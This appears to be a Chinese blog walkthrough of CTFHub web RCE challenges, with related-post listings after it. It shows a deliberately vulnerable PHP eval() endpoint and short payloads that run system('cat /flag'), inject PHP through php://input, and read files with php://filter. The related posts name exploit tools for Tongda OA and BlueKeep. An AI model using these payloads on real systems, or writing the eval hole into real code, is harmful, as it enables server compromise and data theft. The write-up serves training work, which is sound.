CTFhub技能树_Web RCE

最新推荐文章于 2024-05-02 20:40:27 发布
最新推荐文章于 2024-05-02 20:40:27 发布
阅读量1.1k 收藏 5
点赞数 1
分类专栏: CTF 文章标签: web php
原文链接:baidu.com
版权

一、eval执行

1.分析:

打开网站显示如下代码:

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。

eval($_REQUEST["cmd"]);

其中:

eval():该函数可以把字符串作为PHP代码执行

$_REQUEST['']:GETPOST类似,不过反应速度比较慢

2.题解:

首先用?cmd=system("ls");查看一下根目录
此时显示 index.php

继续看上一级文件 ?cmd=system("ls /");

在这里插入图片描述
flag文件很显眼

使用?cmd=system("cat /文件名");打开文件得到flag

在这里插入图片描述

二、文件包含

简略题解:

?file=shell.txt&ctfhub=system("cat /flag");

三、php://input

1.知识点:

php://input是什么?
php:// ~ 来访问各个输入/输出流(I/O streams),php://input 是个可以访问请求的原始数据的只读流。POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。
它是PHP中一个只读的协议,使用时会将请求放在body中

简单的说php://input用于执行php代码
(本题可用burpsuite)

2.简略题解:

先使用:
?file=php://input
用bp代理,加入请求后

<?php system("cat /flag");?>

重发,得到flag

四、读取源代码

1.知识点: php://filter

php://filter用于读取源码

2.简单题解:

?file=php://filter/convert.base64-encode/resource=/flag
得到flag

五、远程包含:

简略题解:

?file=php://filter/convert.base64-encode/resource=phpinfo.php

六、总结:

【php://协议】
条件
不需要开启allow_url_fopen
仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input
php://filter用于读取源码,php://input用于执行php代码。

注意:php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

PHP.ini:
php://filter在双off的情况下也可以正常使用;
即:
allow_url_fopen :off/on
allow_url_include:off/on

在这里插入图片描述
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

PHP.ini:
allow_url_fopen :off/on
allow_url_include:on
在这里插入图片描述
整理转载自:https://www.cnblogs.com/zzjdbk/p/13030717.html

临川南歌
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含漏洞,配合前台文件上传可以直接getshell,无需获取有效Cookie 2.如果本地文件包含漏洞利用失败,则可以利用任意用户登录漏洞与SQL注入漏洞 这两个突破的利用方式集成在了“获取Cookie”按钮上共计6个POC,其中任意一个POC利用成功的都会自动停止,并自动填充有效的Cookie到工具上获取有效的Cookie后,可以选择后台文件发布一键利用如目标存在弱密码,可手动填充有效Cookie后配合文件上传一键利用 3.特定版本v11.6存在任意文件删除漏洞的利用 当目标为v11.6版本时,
ctfhub-eval执行
m0_52432374的博客
03-24 1939
ctfhub-eval执行 打开题目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
PHP代码审计--Challenge6
D-R0s1的博客
02-12 1085
题目代码 <?php if(isset($_REQUEST[ 'ip' ])) { $target = trim($_REQUEST[ 'ip' ]); $substitutions = array( '&' => '', ';' => '', '|' => '', '-' => '', '$' => '', '(' => '', ')' =&gt...
CTFHub 技能树rce
weixin_63231007的博客
05-18 1115
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
CTFWEB题——RCE
tomyyyyy
10-31 5756
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTFHUB WEB RCE
wwwwyyyrre的博客
05-13 258
先来了解一下rce命令RCE英文全称:remote command/code execute分为远程命令执行ping和远程代码执行evel。漏洞出现的原因:没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。
校内ctf平台web小结(rce
New_Ss_的博客
02-03 350
目前都是rce web1 经过代码审计可以看出,如果不存在区分大小写的flag,就会执行”c“。没有经过任何闭合,很简单的构造c=system('ls'); 经过寻找得到flag,可以在flag中添加\来绕过 web2 代码审计,绕过了system函数,我们可以换用passthru,不再赘述。 web3 代码审计可以看到绕过了较多的函数,这里再用别的函数一一绕过太麻烦,我们可以构造?c=include($_GET[a]);来例用php伪协议 ?c=include($
CTF学习)CTFHUB-WEB-RCE
weixin_43486981的博客
08-14 4773
CTFHUB-WEB-RCERCEeval执行文件包含strpos()的漏洞php://input知识点 php://input远程包含读取源代码php://filter命令注入linux中命令的链接符号过滤catlinux查看文本的命令过滤空格过滤目录分隔符过滤运算符综合过滤练习 RCE RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
WebCTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1083
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
php利用阿里云短信SDK实现短信发送功能
最新发布
赛时科技
05-02 669
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
supervisor 简单理解
qq_42857358的博客
04-28 240
test.ini文件内容。
在网站源码后台增加响应式布局
shencz2000的专栏
04-28 412
将左侧的放到上方,将右侧的放到下方。将前台的界面里的style.css里的如下两行内容复制到layout.css。一本教材上的网站源码,后台在手机上查看还是按照电脑的页面样式,不方便查看和发布新内容。对于页面结构简单的网站,可以利用响应式,使页面自动适用各种屏幕的分辨率。对于分辨率为2312×1080的手机屏幕,屏幕宽度就是手机屏幕宽度,初始比例系数为1。这样修改以后,在手机上看到的后台页面也好了很多。另外还要修改layout.html里的三行内容。-- 内容区域 -->-- 内容区域 -->
cve-2018-19518漏洞复现
m0_74402888的博客
04-28 468
php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞。
桌面运维岗面试三十问
一坨小橙子的博客
04-28 739
桌面运维岗面试问题及答案汇总
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种违法行为,在未经授权的情况下进行RCE攻击是被禁止的。在学习过程中,请遵循合法和道德准则,并严禁将所学技术用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值